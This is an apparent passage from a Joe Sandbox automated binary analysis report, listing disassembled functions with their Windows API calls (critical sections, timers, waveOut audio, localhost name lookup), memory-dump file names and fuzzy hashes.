                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF81C0316047494FC724DF39989057BB7F1AF853117148A2FE6A787B81DB38E805CB68
                                                                                                                                                                                                                                                                                                        Function 00401170 Relevance: 13.6, APIs: 9, Instructions: 124timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00401181
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004011B1
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 004011C5
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 004011D5
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004011E3
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040122A
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 0040123E
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00401261
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040129E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeaveTimetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3486229058-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                                                                                                                        • Instruction ID: b4a63a4f06c8fcffd2d454e61e85ed039b73bf68413dd997414ba6e559c29426
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6641D6357003148FCB309F60E80466BB7F4AF6575470486AEE896BB3E1DB38EC459AA5
                                                                                                                                                                                                                                                                                                        Function 00411A80 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 394COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(00000020,00000000), ref: 00411B68
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExchangeInterlocked
                                                                                                                                                                                                                                                                                                        • String ID: GET$_bytesLoaded$_bytesTotal$_customHeaders$contentType$loaded
                                                                                                                                                                                                                                                                                                        • API String ID: 367298776-2876428247
                                                                                                                                                                                                                                                                                                        • Opcode ID: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 337a073203a489cf9af6a636d5e82807fd5ac3b12a53b57697a6972a4ae57270
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6D126706047056BC714EF65D842AABB7E5BF88304F404A2EFA4687392EB38F945C799
                                                                                                                                                                                                                                                                                                        Function 004F34D0 Relevance: 11.4, APIs: 9, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004F5BA3,00000000), ref: 004F34EA
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3537
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3545
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3556
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F355F
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3594
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F359D
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36AD
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36BB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2801635615-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                                                                                                                        • Instruction ID: 93c01fc31a9ee7373f9c1d93048bf40271cec5808ab28bfcb2eca2428eaae834
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F51BE3020474A9BD7249F319558BBBBBF8AF84742F04485EE5DEC3361DB28EA08C724
                                                                                                                                                                                                                                                                                                        Function 004F36F0 Relevance: 11.3, APIs: 9, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004F3709
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F374C
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F375C
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F376D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F377A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F37A9
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F37C5
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F37D5
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F37EC
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1822ab8b2bc00c4b335a7296647f06df4fe24da2c1cedc303b1505dbbb5a7089
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2831D1B11087894BC610AF35A9807EBFBF8BF89714F04499DE5E953251C734AA1DC726
                                                                                                                                                                                                                                                                                                        Function 004D7D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: gethostbynamehtonlhtonsinet_addr
                                                                                                                                                                                                                                                                                                        • String ID: localhost
                                                                                                                                                                                                                                                                                                        • API String ID: 4009071410-2663516195
                                                                                                                                                                                                                                                                                                        • Opcode ID: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                                                                                                                        • Instruction ID: cf482c115b2fa46a5b5609c5aae3d134ea41c2cdeafd480f3feffcf81808ee73
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9131ED30208311ABDB20DF249C85BBBB7E5FF95710F004A1EF9559B381E7719948C7A6
                                                                                                                                                                                                                                                                                                        Function 004144DE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 324timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(00000000), ref: 004145E1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Timetime
                                                                                                                                                                                                                                                                                                        • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                        • API String ID: 17336451-2178600047
                                                                                                                                                                                                                                                                                                        • Opcode ID: a6eb4a1a4bf024f16c397edd5e841aed2049ab2de515439dd25e44f6491a1c28
                                                                                                                                                                                                                                                                                                        • Instruction ID: e32ce3efbecf0e845fb5c017bd6949167df468d5a0ad1b28c98723774e94ba96
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6eb4a1a4bf024f16c397edd5e841aed2049ab2de515439dd25e44f6491a1c28
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79C17E313046059BD718DF15C494BEA77A6BFC8704F18856EE8498F382CB79ED42CB9A
                                                                                                                                                                                                                                                                                                        Function 004D8B00 Relevance: 9.1, APIs: 6, Instructions: 53sleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeKillEvent.WINMM(?), ref: 004D8B13
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000001,?,0041D4A9), ref: 004D8B2D
                                                                                                                                                                                                                                                                                                        • waveOutReset.WINMM(?,?,0041D4A9), ref: 004D8B34
                                                                                                                                                                                                                                                                                                        • waveOutUnprepareHeader.WINMM(?,-000013C4,00000020,?,?,0041D4A9), ref: 004D8B5A
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000001,?,?,0041D4A9), ref: 004D8B63
                                                                                                                                                                                                                                                                                                        • waveOutClose.WINMM(?,?,0041D4A9), ref: 004D8B86
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: wave$Sleep$CloseEventHeaderKillResetUnpreparetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3030913982-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
